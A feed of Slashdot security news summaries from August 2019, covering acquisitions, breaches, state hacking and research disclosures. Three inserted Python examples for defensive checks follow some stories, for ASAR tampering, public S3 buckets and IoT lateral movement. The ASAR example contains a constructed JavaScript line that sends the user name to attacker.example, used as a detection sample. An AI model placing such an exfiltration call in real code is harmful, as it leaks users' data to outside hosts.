Slashdot security articles


$10.7 Billion Broadcom-Symantec Enterprise Deal Creates Software Titan

Thu, 08/08/2019 - 13:25
An anonymous reader quotes a report from CRN: Broadcom has agreed to purchase Symantec's enterprise business in a massive $10.7 billion deal that will break up the world's largest pure-play cybersecurity vendor. The San Jose, Calif.-based semiconductor manufacturer said the monster acquisition is expected to drive $2 billion of revenue and $1.3 billion of EBITDA (earnings before interest, taxation, depreciation, and amortization), as well as upwards of $1 billion of cost synergies in the year following close. The Symantec name will be sold to Broadcom as part of the transaction. The deal will bring Symantec's $2.5 billion enterprise unit together with the software capabilities inherited last year through its $19 billion acquisition of CA Technologies. Symantec's enterprise business includes its traditional strength around anti-virus and endpoint protection as well as the cloud security capabilities inherited through the 2016 acquisition of Blue Coat Systems. "Meanwhile, Symantec's consumer business -- which includes its legacy Norton anti-virus capabilities as well as its more recent acquisition of LifeLock -- will become a standalone company," the report adds. "Interim Symantec President and CEO Rick Hill said the remaining consumer business contributed 90 percent of the company's total operating income, and the company expects to be able to continue to grow revenue for its Norton LifeLock business in the mid-single digits going forward."

Facebook Loses Facial Recognition Technology Appeal, Must Face Class Action

Thu, 08/08/2019 - 11:40
In a landmark decision, the Ninth Circuit today ruled that Facebook must face a class action suit claiming that its facial recognition practices violated an Illinois biometric privacy law. From a report: A federal appeals court on Thursday rejected Facebook's effort to undo a class action lawsuit claiming that it illegally collected and stored biometric data for millions of users without their consent. The 3-0 decision from the 9th U.S. Circuit Court of Appeals in San Francisco exposes Facebook to billions of dollars in potential damages to the Illinois users who brought the case. It came as the social media company faces broad criticism from lawmakers and regulators over its privacy practices. Last month, Facebook agreed to pay a record $5 billion fine to settle a Federal Trade Commission data privacy probe. "This biometric data is so sensitive that if it is compromised, there is simply no recourse," Shawn Williams, a lawyer for plaintiffs in the class action, said in an interview. "It's not like a Social Security card or credit card number where you can change the number. You can't change your face."

Kazakhstan Halts Introduction of Internet Surveillance System

Thu, 08/08/2019 - 08:40
Kazakhstan has halted the implementation of an internet surveillance system criticized by lawyers as illegal, with the government describing its initial rollout as a test. From a report: Mobile phone operators in the oil-rich Central Asian nation's capital, Nur-Sultan, had asked customers to install an encryption certificate on their devices or risk losing internet access. State security officials said its goal was to protect Kazakh users from "hacker attacks, online fraud and other kinds of cyber threats." The certificate allowed users' traffic to be intercepted by the government, circumventing encryption used by email and messaging applications. Several Kazakh lawyers said this week they had sued the country's three mobile operators, arguing that restricting internet access to those who refused to install the certificate would be illegal. But late on Tuesday, Kazakhstan's State Security Committee said in a statement that the certificate rollout was simply a test which has now been completed. Users can remove the certificate and use the internet as usual, it said.

WordPress Team Working on Daring Plan To Forcibly Update Old Websites

Thu, 08/08/2019 - 07:24
The developers behind the WordPress open-source content management system (CMS) are working on a plan to forcibly auto-update older versions of the CMS to more recent releases. From a report: The goal of this plan is to improve the security of the WordPress ecosystem, and the internet as a whole, since WordPress installations account for more than 34% of all internet websites. Officially supported versions include only the last six WordPress major releases, which currently are all the versions between v4.7 and v5.2. The plan is to slowly auto-update old WordPress sites, starting with v3.7, to the current minimum supported version, which is the v4.7 release. The WordPress team said it plans to monitor this tiered forced auto-update process for errors and site breakage. If there's something massively wrong, then auto-update can be stopped altogether. If only a few individual sites break, then those sites will be rolled back to their previous versions and the owner will be notified via email.

Broadcom Close To Buying Symantec's Enterprise Business

Thu, 08/08/2019 - 05:00
phalse phace writes: Broadcom's on-again, off-again talks to buy Symantec are on again, but this time Broadcom is just interested in Symantec's Enterprise Business. According to the Wall Street Journal: "Broadcom is nearing a deal to buy Symantec's enterprise business after its attempted purchase of the entire cybersecurity firm fell apart. A deal for the Symantec business could be announced as early as Thursday, when Symantec reports its results, according to people familiar with the matter. The deal could value the Symantec division at around $10 billion, one of the people said. Broadcom had previously been in late-stage discussions to buy all of Symantec before the talks collapsed last month. Since then, the two sides have restarted discussions, with Broadcom zeroing in on the Symantec business that serves businesses and accounts for roughly half its $5 billion in annual revenue. The consumer segment accounts for the rest. The deal would be big for Symantec. Its entire market value is about $12.6 billion -- it has more than $2 billion of net debt -- compared with about $107.6 billion for Broadcom." UPDATE: It's official, Broadcom is acquiring Symantec's Enterprise Business for $10.7 billion.

Skype, Slack, Other Electron-Based Apps Can Be Easily Backdoored

Wed, 08/07/2019 - 19:30
An anonymous reader quotes a report from Ars Technica: The Electron development platform is a key part of many applications, thanks to its cross-platform capabilities. Based on JavaScript and Node.js, Electron has been used to create client applications for Internet communications tools (including Skype, WhatsApp, and Slack) and even Microsoft's Visual Studio Code development tool. But Electron can also pose a significant security risk because of how easily Electron-based applications can be modified without triggering warnings. At the BSides LV security conference on Tuesday, Pavel Tsakalidis demonstrated a tool he created called BEEMKA, a Python-based tool that allows someone to unpack Electron ASAR archive files and inject new code into Electron's JavaScript libraries and built-in Chrome browser extensions. The vulnerability is not part of the applications themselves but of the underlying Electron framework -- and that vulnerability allows malicious activities to be hidden within processes that appear to be benign. Tsakalidis said that he had contacted Electron about the vulnerability but that he had gotten no response -- and the vulnerability remains. While making these changes required administrator access on Linux and MacOS, it only requires local access on Windows. Those modifications can create new event-based "features" that can access the file system, activate a Web cam, and exfiltrate information from systems using the functionality of trusted applications -- including user credentials and sensitive data. In his demonstration, Tsakalidis showed a backdoored version of Microsoft Visual Studio Code that sent the contents of every code tab opened to a remote website. The problem lies in the fact that Electron ASAR files themselves are not encrypted or signed, allowing them to be modified without changing the signature of the affected applications. A request from developers to be able to encrypt ASAR files was closed by the Electron team without action.
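The point of the BEEMKA demonstration is that an ASAR archive is a plain container with a JSON index and no signature, so the JavaScript inside can be swapped without the host binary's code signature changing. The following is an added example, not code from the original article, from BEEMKA or from the Electron project: it builds a tiny constructed ASAR (the file names and contents are made up, not a real application), parses the header the way the asar format lays it out (a size pickle, a JSON header pickle padded to four bytes, then the raw file bytes), hashes every packed file, and compares the result to a baseline recorded at install time. The tampered copy simulates the kind of injection described above by appending an exfiltration call to main.js; the archive still parses perfectly, which is exactly why a separate integrity baseline is needed.

```python
import hashlib
import json
import struct

# Constructed stand-in for an Electron app's app.asar contents (not a real
# application). A real archive also carries node_modules and more.
APP_FILES = {
    "package.json": b'{"name":"demo-app","main":"main.js"}',
    "main.js": b"const {app} = require('electron');\napp.whenReady().then(() => {});\n",
    "renderer/index.html": b"<html><body>demo</body></html>",
}

# The same app after an attacker appended an exfiltration hook to main.js
# (constructed; attacker.example is a placeholder host).
TAMPERED_FILES = dict(APP_FILES)
TAMPERED_FILES["main.js"] = APP_FILES["main.js"] + (
    b"require('https').get('https://attacker.example/' + process.env.USER);\n")


def build_asar(files):
    """Assemble an ASAR archive from {path: bytes}.

    Layout as used by Electron's asar format: a pickle holding the header size
    (uint32 payload length 4, then the size), a pickle holding the JSON header
    (uint32 payload length, uint32 string length, JSON, padding to 4 bytes),
    then every file's bytes back to back. Paths containing '/' become nested
    directory objects in the header, as asar does.
    """
    header = {"files": {}}
    blobs = []
    offset = 0
    for path, data in files.items():
        node = header
        parts = path.split("/")
        for part in parts[:-1]:
            node = node["files"].setdefault(part, {"files": {}})
        node["files"][parts[-1]] = {"size": len(data), "offset": str(offset)}
        blobs.append(data)
        offset += len(data)
    header_json = json.dumps(header).encode()
    padded = (len(header_json) + 3) & ~3
    header_pickle = (struct.pack("<II", 4 + padded, len(header_json))
                     + header_json.ljust(padded, b"\0"))
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return size_pickle + header_pickle + b"".join(blobs)


def parse_asar(blob):
    """Return (header dict, offset at which file data begins)."""
    header_size, = struct.unpack_from("<I", blob, 4)
    json_len, = struct.unpack_from("<I", blob, 12)
    header = json.loads(blob[16:16 + json_len])
    return header, 8 + header_size


def iter_files(node, prefix=""):
    """Walk the nested header and yield (path, offset, size) for packed files."""
    for name, meta in node["files"].items():
        path = f"{prefix}/{name}" if prefix else name
        if "files" in meta:
            yield from iter_files(meta, path)
        elif not meta.get("unpacked"):  # unpacked entries live outside the archive
            yield path, int(meta["offset"]), meta["size"]


def file_hashes(blob):
    """SHA-256 of every packed file, keyed by path."""
    header, data_start = parse_asar(blob)
    return {
        path: hashlib.sha256(blob[data_start + off:data_start + off + size]).hexdigest()
        for path, off, size in iter_files(header)
    }


def verify_against_baseline(blob, baseline):
    """Paths added, removed or modified relative to a known-good hash baseline."""
    current = file_hashes(blob)
    return sorted(p for p in set(current) | set(baseline)
                  if current.get(p) != baseline.get(p))


if __name__ == "__main__":
    clean = build_asar(APP_FILES)
    baseline = file_hashes(clean)  # record this at install time, store it out of band
    print("clean archive changed files:", verify_against_baseline(clean, baseline))
    print("tampered archive changed files:",
          verify_against_baseline(build_asar(TAMPERED_FILES), baseline))
```

The baseline has to live somewhere the attacker cannot also rewrite (a signed manifest, an EDR database, a read-only share); a hash list stored next to app.asar gives no protection, since whoever can edit the archive can edit the list. Newer Electron releases add an optional integrity field to the header and a fuse to enforce it, but the archive on disk is still unsigned, so host-level file integrity monitoring of this kind remains the practical check.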

Google Pixel 4 Will Have 90Hz 'Smooth Display' and DSLR Camera Attachment

Wed, 08/07/2019 - 17:45
According to 9to5Google, Google's upcoming Pixel 4 and Pixel 4 XL smartphones will feature 90Hz refresh rates, 6GB of RAM, and a DSLR attachment, among other features not reported until now. From the report: First, the basics: There will be a Pixel 4 and Pixel 4 XL, and they will both more or less have the same features. They are phones. As we've already seen, they will have glass on the front and back, and a large camera bump. They have a sizable top bezel on the front housing the Soli radar chip, the speaker, a single front shooter, and the suite of sensors for face unlock. Other familiar aesthetic flourishes like a colored lock button and the usual 'G' logo on the back are also in tow. Things get a little interesting with the display specs. Pixel 4 and Pixel 4 XL will have 5.7-inch and 6.3-inch OLED displays, respectively -- the smaller is Full HD+, while the larger is Quad HD+. We can confirm now, though, that both will be 90 Hz displays, a feature Google is planning to call "Smooth Display." We also have word on the Pixel 4 and Pixel 4 XL camera specs. There are two sensors on the rear, one of which is a 12MP shooter with phase-detect auto-focus. Also, confirming details that we unearthed in the Google Camera app, the other rear sensor on the Google Pixel 4 and Pixel 4 XL is a 16MP telephoto lens. Another interesting tidbit on the camera side: We're told Google is developing a DSLR-like attachment for the Pixel 4 that may become an available accessory. In other Pixel 4 specs, the smaller 5.7-inch Google Pixel 4 will have a 2,800 mAh battery, while the larger model will have a 3,700 mAh battery. That means, compared to last year, the smaller Pixel will have a slightly smaller battery (down from 2,915 mAh), while the larger Pixel will have a notably beefier one (up from 3,430 mAh). Both devices will pack the Snapdragon 855, get an appreciated bump to 6GB of RAM, and will be available in both 64GB and 128GB variants in the United States.
Finally, we can confirm that both Pixel 4 models will have stereo speakers, the Titan M security module that was introduced with the Pixel 3, and of course, the latest version of Android with 3 years of software support. We're also told to expect that, like previous years, Google will show off some new Assistant features that will be exclusive to Pixel 4.

Twitter Fesses Up To More Adtech Leaks

Wed, 08/07/2019 - 16:03
Twitter has disclosed more bugs related to how it uses personal data for ad targeting, which means it may have shared users' data with advertising partners even when a user had expressly told it not to. TechCrunch reports: Back in May the social network disclosed a bug that in certain conditions resulted in an account's location data being shared with a Twitter ad partner, during real-time bidding (RTB) auctions. In a blog post on its Help Center about the latest "issues" Twitter says it "recently" found, it admits to finding two problems with users' ad settings choices that mean they "may not have worked as intended." It claims both problems were fixed on August 5. Though it does not specify when it realized it was processing user data without their consent. The first bug relates to tracking ad conversions. This meant that if a Twitter user clicked or viewed an ad for a mobile application on the platform and subsequently interacted with the mobile app Twitter says it "may have shared certain data (e.g., country code; if you engaged with the ad and when; information about the ad, etc)" with its ad measurement and advertising partners -- regardless of whether the user had agreed their personal data could be shared in this way. It suggests this leak of data has been happening since May 2018 -- which is also the day when Europe's updated privacy framework, GDPR, came into force. Twitter specifies that it does not share users' names, Twitter handles, email or phone number with ad partners. However it does share a user's mobile device identifier, which GDPR treats as personal data as it acts as a unique identifier. The second issue Twitter discloses in the blog post also relates to tracking users' wider web browsing to serve them targeted ads.
Here Twitter admits that, since September 2018, it may have served targeted ads that used inferences made about the user's interests based on tracking their wider use of the Internet -- even when the user had not given permission to be tracked.

A Boeing Code Leak Exposes Security Flaws Deep In a 787's Guts

Wed, 08/07/2019 - 14:40
An anonymous reader quotes a report from Wired: Late one night last September, security researcher Ruben Santamarta sat in his home office in Madrid and partook in some creative googling, searching for technical documents related to his years-long obsession: the cybersecurity of airplanes. He was surprised to discover a fully unprotected server on Boeing's network, seemingly full of code designed to run on the company's giant 737 and 787 passenger jets, left publicly accessible and open to anyone who found it. So he downloaded everything he could see. Now, nearly a year later, Santamarta claims that leaked code has led him to something unprecedented: security flaws in one of the 787 Dreamliner's components, deep in the plane's multi-tiered network. He suggests that for a hacker, exploiting those bugs could represent one step in a multistage attack that starts in the plane's in-flight entertainment system and extends to highly protected, safety-critical systems like flight controls and sensors. At the Black Hat security conference today in Las Vegas, Santamarta, a researcher for security firm IOActive, plans to present his findings, including the details of multiple serious security flaws in the code for a component of the 787 known as a Crew Information Service/Maintenance System. The CIS/MS is responsible for applications like maintenance systems and the so-called electronic flight bag, a collection of navigation documents and manuals used by pilots. Santamarta says he found a slew of memory corruption vulnerabilities in that CIS/MS, and he claims that a hacker could use those flaws as a foothold inside a restricted part of a plane's network. An attacker could potentially pivot, Santamarta says, from the in-flight entertainment system to the CIS/MS to send commands to far more sensitive components that control the plane's safety-critical systems, including its engine, brakes, and sensors. 
Boeing maintains that other security barriers in the 787's network architecture would make that progression impossible. Boeing said in a statement that it had investigated IOActive's claims and concluded that they don't represent any real threat of a cyberattack. "IOActive's scenarios cannot affect any critical or essential airplane system and do not describe a way for remote attackers to access important 787 systems like the avionics system," the company's statement reads. "IOActive reviewed only one part of the 787 network using rudimentary tools, and had no access to the larger system or working environments. IOActive chose to ignore our verified results and limitations in its research, and instead made provocative statements as if they had access to and analyzed the working system. While we appreciate responsible engagement from independent cybersecurity researchers, we're disappointed in IOActive's irresponsible presentation." Boeing says the company put an actual Boeing 787 in "flight mode" to test and try to exploit the vulnerabilities. They found that they couldn't carry out a successful attack.

With Warshipping, Hackers Ship Their Exploits Directly To Their Target's Mail Room

Wed, 08/07/2019 - 13:25
Why break into a company's network when you can just walk right in -- literally? From a report: Gone could be the days of having to find a zero-day vulnerability in a target's website, or having to scramble for breached usernames and passwords to break through a company's login pages. And certainly there will be no need to park outside a building and brute-force the Wi-Fi network password. Just drop your exploit in the mail and let your friendly postal worker deliver it to your target's door. This newly named technique -- dubbed "warshipping" -- is not a new concept. Just think of the traditional Trojan horse rolling into the city of Troy, or when hackers drove up to TJX stores and stole customer data by breaking into the store's Wi-Fi network. But security researchers at IBM's X-Force Red say it's a novel and effective way for an attacker to gain an initial foothold on a target's network. "It uses disposable, low cost and low power computers to remotely perform close-proximity attacks, regardless of the cyber criminal's location," wrote Charles Henderson, who heads up the IBM offensive operations unit.

North Korea Took $2 Billion in Cyberattacks To Fund Weapons Program

Wed, 08/07/2019 - 12:05
An anonymous reader shares a report: North Korea has generated an estimated $2 billion for its weapons of mass destruction programs using "widespread and increasingly sophisticated" cyberattacks to steal from banks and cryptocurrency exchanges, according to a confidential U.N. report seen by Reuters on Monday. Pyongyang also "continued to enhance its nuclear and missile programmes although it did not conduct a nuclear test or ICBM (Intercontinental Ballistic Missile) launch," said the report to the U.N. Security Council North Korea sanctions committee by independent experts monitoring compliance over the past six months. The experts said North Korea "used cyberspace to launch increasingly sophisticated attacks to steal funds from financial institutions and cryptocurrency exchanges to generate income." They also used cyberspace to launder the stolen money, the report said.

High-Security Locks For Government and Banks Hacked By Researcher

Tue, 08/06/2019 - 17:25
pgmrdlm shares a report from Reuters: Hackers could crack open high-security electronic locks by monitoring their power, allowing thieves to steal cash in automated teller machines, narcotics in pharmacies and government secrets, according to research to be presented Friday at the annual Def Con hacking conference in Las Vegas. Mike Davis, a researcher with security firm IOActive, discovered the vulnerability last year and alerted government officials and Swiss company DormaKaba Holding, the distributor of multiple brands of locks at issue. In an interview with Reuters, Davis said he used an oscilloscope worth about $5,000 to detect small changes in the power consumption, through what is known as a side-channel attack. The method worked best in older models. The locks include their own power supply so they function even when an external source of electricity is cut off. Most versions do not consume extra or randomized power to hide what they are doing. That leaves them open to attack if a thief can get physically close enough and has the right tools, Davis said. "I can download that analog signal and parse through the power trace to get ones and zeroes," Davis said. "I know what the lock is doing internally." Inside ATMs, the company's locks typically protect the cash in the more secure, lower compartment. An upper compartment includes the interface with customers and directs the lower compartment to send up money. The upper compartment often has less physical security, and breaking into it might provide access to the lower vault's vulnerable lock. A bigger concern is that another series of DormaKaba locks are used on military bases, U.S. presidential jet Air Force One and elsewhere in the government.

Windows Defender Achieves 'Best Antivirus' Status

Tue, 08/06/2019 - 16:45
An anonymous reader quotes a report from PC Magazine: As Softpedia reports, the independent IT security institute AV-TEST spent May and June continuously evaluating 20 home user security products using their default settings to see which offered the best protection. Only four of those products achieved a top score, and one of them was Windows Defender. The other three are F-Secure SAFE 17, Kaspersky Internet Security 19.0, and Norton Security 22.17. The big difference between these and Windows Defender is the fact Microsoft includes Windows Defender for free with Windows 10, whereas the others require a paid subscription to continue being fully functional. "Of the other products evaluated, Webroot SecureAnywhere 9.0 came last," adds PC Magazine. "Those just missing out on the top score while still earning an AV-TEST 'Top Product' award include Avast Free AntiVirus 19.5, AVG Internet Security 19.5, Bitdefender Internet Security 23.0, Trend Micro Internet Security 15.0, and VIPRE AdvancedSecurity 11.0."

Google Expands its Advanced Protection Program To Chrome

Tue, 08/06/2019 - 16:07
Google is expanding its Advanced Protection Program to its Chrome browser. From a report: If you're an Advanced Protection Program user and you have sync turned on in Chrome, you will now automatically receive stronger protections against risky downloads. Google didn't go into much detail regarding the protections, likely not to publicly give away how they work. But the company did say that when users attempt to download "certain risky files," Chrome will now show additional warnings, or in some cases even block the downloads outright. The warnings are, however, only available in Chrome for Windows, Mac, and Linux. Google is not rolling out the Advanced Protection Program to Chrome for Android and iOS.

Final Red Hat Enterprise Linux 7 Version Released

Tue, 08/06/2019 - 13:20
The last RHEL 7 release, RHEL 7.7, is now available for current Red Hat Enterprise Linux subscribers via the Red Hat Customer Portal. ZDNet reports on what's new: RHEL 7.7's most important updates are support for the latest generation of enterprise hardware and remediation for the recently disclosed ZombieLoad vulnerabilities. The latest RHEL 7 also includes network stack performance enhancements. With this release, you can offload virtual switching operations to network interface card (NIC) hardware. What that means for you is, if you're using virtual switching and network function virtualization (NFV), you'll see better network performance on cloud and container platforms such as Red Hat OpenStack Platform and Red Hat OpenShift. RHEL 7.7 users can also use Red Hat's new predictive problem shooter: Red Hat Insights. This uses a software-as-a-service (SaaS)-based predictive analytics approach to spot, assess, and mitigate potential problems with their systems before they can cause trouble. For developers, RHEL 7.7 comes with the Python 3.6 interpreter, and the pip and setuptools utilities. Previously, Python 3 versions were available only as a part of Red Hat Software Collections. Moving on to the cloud, RHEL 7.7 Red Hat Image Builder is now supported. This feature, which is also in RHEL 8, enables you to easily create custom RHEL system images for cloud and virtualization platforms such as Amazon Web Services (AWS), VMware vSphere, and OpenStack. To help cloud-native developers, RHEL 7.7 includes full support for Red Hat's distributed-container toolkit -- buildah, podman, and skopeo -- on RHEL workstations. After building on the desktop, programmers can use Red Hat Universal Base Image to build, run, and manage containerized applications across the hybrid cloud.

China Warns India of 'Reverse Sanctions' if Huawei is Blocked

Tue, 08/06/2019 - 11:25
China has told India not to block Huawei from doing business in the country, warning there could be consequences for Indian firms operating in China, Reuters reported on Tuesday, citing sources with knowledge of the matter. From a report: India is due to hold trials for installing a next-generation 5G cellular network in the next few months, but has not yet taken a call on whether it would invite the Chinese telecoms equipment maker to take part, telecoms minister Ravi Shankar Prasad has said. Huawei, the world's biggest maker of such gear, is at the centre of a geopolitical tug-of-war between China and the United States. U.S. President Donald Trump's administration put the company on a blacklist in May, citing national security concerns. It has asked its allies not to use Huawei equipment, which it says China could exploit for spying.

AT&T Employees Took Bribes To Plant Malware on the Company's Network

Tue, 08/06/2019 - 07:28
AT&T employees took bribes to unlock millions of smartphones, and to install malware and unauthorized hardware on the company's network, the Department of Justice said yesterday. From a report: These details come from a DOJ case opened against Muhammad Fahd, a 34-year-old man from Pakistan, and his co-conspirator, Ghulam Jiwani, believed to be deceased. The DOJ charged the two with paying more than $1 million in bribes to several AT&T employees at the company's Mobility Customer Care call center in Bothell, Washington. The bribery scheme lasted from at least April 2012 until September 2017. Initially, the two Pakistani men bribed AT&T employees to unlock expensive iPhones so they could be used outside AT&T's network. The two recruited AT&T employees by approaching them in private via telephone or Facebook messages. Employees who agreed received lists of IMEI phone codes which they had to unlock for sums of money. Employees would then receive bribes in their bank accounts, in shell companies they created, or as cash, from the two Pakistani men.

Democratic Senate Campaign Group Exposed 6.2 Million Americans' Emails

Tue, 08/06/2019 - 06:43
A political campaign group working to elect Democratic senators left a spreadsheet containing the email addresses of 6.2 million Americans on an exposed server. From a report: Data breach researchers at security firm UpGuard found the data in late July, and traced the storage bucket back to a former staffer at the Democratic Senatorial Campaign Committee, an organization that seeks grassroots donations and contributions to help elect Democratic candidates to the U.S. Senate. Following the discovery, UpGuard researchers reached out to the DSCC and the storage bucket was secured within a few hours. The researchers shared their findings exclusively with TechCrunch and published their findings. The spreadsheet was titled "EmailExcludeClinton.csv" and was found in a similarly named unprotected Amazon S3 bucket without a password. The file was uploaded in 2010 -- a year after former Democratic senator and presidential candidate Hillary Clinton, whom the data is believed to be named after, became secretary of state. UpGuard said the data may be of people "who had opted out or should otherwise be excluded" from the committee's marketing.
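An S3 bucket is "unprotected" in the sense used above when its policy or ACL grants anonymous read. The following is an added example, not part of the report and not UpGuard's tooling: it audits a bucket policy document for statements that let everyone read or list, handling the string-or-list forms IAM allows and the wildcard action patterns (s3:*, s3:Get*) that a naive equality check misses. The policy, bucket name, account ID and VPC endpoint ID are all constructed for the example.

```python
import fnmatch
import json

# Constructed bucket policy (fictional bucket, account and endpoint; not the
# DSCC's). Statement 2 is the kind that exposes a bucket to the whole internet.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "TeamRead", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/ListManagers"},
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-campaign-lists/*"},
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-campaign-lists",
                      "arn:aws:s3:::example-campaign-lists/*"]},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "s3:Get*",
         "Resource": "arn:aws:s3:::example-campaign-lists/*",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0example"}}},
        {"Sid": "DenyDelete", "Effect": "Deny", "Principal": "*",
         "Action": "s3:DeleteObject",
         "Resource": "arn:aws:s3:::example-campaign-lists/*"},
    ],
})

# Operations that let an anonymous caller enumerate or download data.
READ_ACTIONS = ("s3:GetObject", "s3:ListBucket")


def as_list(value):
    """IAM lets most fields be a string or a list; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def principal_is_everyone(principal):
    """True for Principal "*" or {"AWS": "*"} in any spelling (anonymous access)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in as_list(principal.get("AWS"))
    return False


def grants_read(actions):
    """True if any action pattern (s3:*, s3:Get*, ...) covers a read operation.
    IAM action matching is case-insensitive, so compare lower-cased."""
    return any(fnmatch.fnmatchcase(read.lower(), pat.lower())
               for pat in as_list(actions) for read in READ_ACTIONS)


def find_public_read(policy_json):
    """Return Allow statements that give everyone read or list access."""
    findings = []
    for i, st in enumerate(json.loads(policy_json).get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        if not principal_is_everyone(st.get("Principal")):
            continue
        if not grants_read(st.get("Action")):
            continue
        findings.append({
            "sid": st.get("Sid", f"statement[{i}]"),
            "actions": as_list(st.get("Action")),
            # A Condition may narrow anonymous access (here to one VPC endpoint);
            # it still deserves a manual look, so report it at lower severity.
            "severity": "public-with-condition" if st.get("Condition") else "public",
        })
    return findings


if __name__ == "__main__":
    for f in find_public_read(SAMPLE_POLICY):
        print(f"{f['severity']:22} {f['sid']:12} {', '.join(f['actions'])}")
```

The bucket policy is only one of the paths to a public bucket: bucket and object ACLs can grant READ to the AllUsers group independently of any policy, and the account-level S3 Block Public Access setting overrides both. In a real audit, run a check like this against the policy, the ACLs and the Block Public Access configuration together rather than any one of them.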

Microsoft Catches Russian State Hackers Using IoT Devices To Breach Networks

Tue, 08/06/2019 - 05:00
An anonymous reader quotes a report from Ars Technica: Hackers working for the Russian government have been using printers, video decoders, and other so-called Internet-of-things devices as a beachhead to penetrate targeted computer networks, Microsoft officials warned on Monday. "These devices became points of ingress from which the actor established a presence on the network and continued looking for further access," officials with the Microsoft Threat Intelligence Center wrote in a post. "Once the actor had successfully established access to the network, a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data." Microsoft researchers discovered the attacks in April, when a voice-over-IP phone, an office printer, and a video decoder in multiple customer locations were communicating with servers belonging to "Strontium," a Russian government hacking group better known as Fancy Bear or APT28. In two cases, the passwords for the devices were the easily guessable default ones they shipped with. In the third instance, the device was running an old firmware version with a known vulnerability. While Microsoft officials concluded that Strontium was behind the attacks, they said they weren't able to determine what the group's ultimate objectives were. Microsoft says they have notified the makers of the targeted IoT devices so they can add new protections. "Monday's report also provided IP addresses and scripts organizations can use to detect if they have also been targeted or infected," adds Ars Technica. "Beyond that, Monday's report reminded people that, despite Strontium's above-average hacking abilities, an IoT device is often all it needs to gain access to a targeted network."
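The Microsoft report's two observations, devices phoning home to external servers and then scanning the internal network for other weak hosts, translate directly into detection logic. The following is an added example, not taken from the Microsoft post or the Ars Technica article and not using any indicators from them: it runs two rules over constructed flow records (the IP addresses, device inventory and timestamps are all made up) and flags IoT-class devices that initiate connections to the internet or that probe other internal hosts on ports used for lateral movement. The inventory of which hosts are printers or phones is the input that makes this work; without it a flow log cannot tell a printer from a workstation.

```python
import ipaddress
import re

# Constructed asset inventory (IP -> device class). In practice this comes from
# a CMDB, DHCP leases or switch port profiles.
ASSETS = {
    "10.0.5.21": "voip-phone",
    "10.0.5.22": "printer",
    "10.0.5.23": "video-decoder",
    "10.0.7.10": "workstation",
}
IOT_CLASSES = {"voip-phone", "printer", "video-decoder"}

# Address space treated as "inside"; anything else counts as the internet.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Ports an IoT device has no business opening to other internal hosts: SSH,
# Telnet, RPC/SMB, RDP, WinRM. A printer probing these looks like the
# post-compromise scan described in the report.
LATERAL_PORTS = {22, 23, 135, 139, 445, 3389, 5985}

# Constructed flow records in a key=value style (not from any real network;
# the external addresses are from the RFC 5737 documentation ranges).
SAMPLE_FLOWS = """\
2019-04-02T09:14:03Z src=10.0.7.10 dst=192.0.2.10 dport=443 proto=tcp
2019-04-02T09:14:07Z src=10.0.5.22 dst=10.0.0.5 dport=631 proto=tcp
2019-04-02T09:15:11Z src=10.0.5.21 dst=198.51.100.23 dport=443 proto=tcp
2019-04-02T09:15:40Z src=10.0.5.23 dst=10.0.7.10 dport=445 proto=tcp
2019-04-02T09:16:02Z src=10.0.5.22 dst=10.0.5.23 dport=23 proto=tcp
"""

FLOW_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+) proto=(\S+)$")


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text):
    """Yield one dict per well-formed flow line; malformed lines are skipped."""
    for line in text.splitlines():
        m = FLOW_RE.match(line.strip())
        if m:
            ts, src, dst, dport, proto = m.groups()
            yield {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "proto": proto}


def detect(flow_text, assets=ASSETS):
    """Alerts for IoT-class sources that beacon out or probe lateral-movement ports."""
    alerts = []
    for flow in parse_flows(flow_text):
        device = assets.get(flow["src"])
        if device not in IOT_CLASSES:
            continue  # workstations and servers need different baselines
        if not is_internal(flow["dst"]):
            alerts.append({**flow, "device": device, "rule": "iot-outbound-internet"})
        elif flow["dport"] in LATERAL_PORTS:
            alerts.append({**flow, "device": device, "rule": "iot-lateral-probe"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_FLOWS):
        print(f"{a['ts']} {a['rule']:22} {a['device']:14} {a['src']} -> {a['dst']}:{a['dport']}")
```

The outbound rule will fire on legitimate vendor update or telemetry traffic, so the usual refinement is an allowlist of vendor destinations per device class; the lateral rule has far fewer benign explanations and should page. Both rules also argue for the network-side fix the report implies: put IoT devices on a segment that cannot reach the internet or user workstations at all, so the question never comes up.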

Amazon Is Coaching Cops On How To Obtain Surveillance Footage Without a Warrant

Mon, 08/05/2019 - 16:45
popcornfan679 shares a report from Motherboard: When police partner with Ring, Amazon's home surveillance camera company, they get access to the "Law Enforcement Neighborhood Portal," an interactive map that allows officers to request footage directly from camera owners. Police don't need a warrant to request this footage, but they do need permission from camera owners. Emails and documents obtained by Motherboard reveal that people aren't always willing to provide police with their Ring camera footage. However, Ring works with law enforcement and gives them advice on how to persuade people to give them footage. Emails obtained from the police department in Maywood, NJ -- and emails from the police department of Bloomfield, NJ, which were also posted by Wired -- show that Ring coaches police on how to obtain footage. The company provides cops with templates for requesting footage, which they do not need a court warrant to do. Ring suggests cops post often on Neighbors, Ring's free "neighborhood watch" app, where Ring camera owners have the option of sharing their camera footage. As reported by GovTech on Friday, police can request Ring camera footage directly from Amazon, even if a Ring customer declines to provide police with the footage. It's a workaround that allows police to essentially "subpoena" anything captured on Ring cameras. Last week, Motherboard also found that at least 200 law enforcement agencies around the country have entered into partnerships with Amazon's home surveillance company Ring.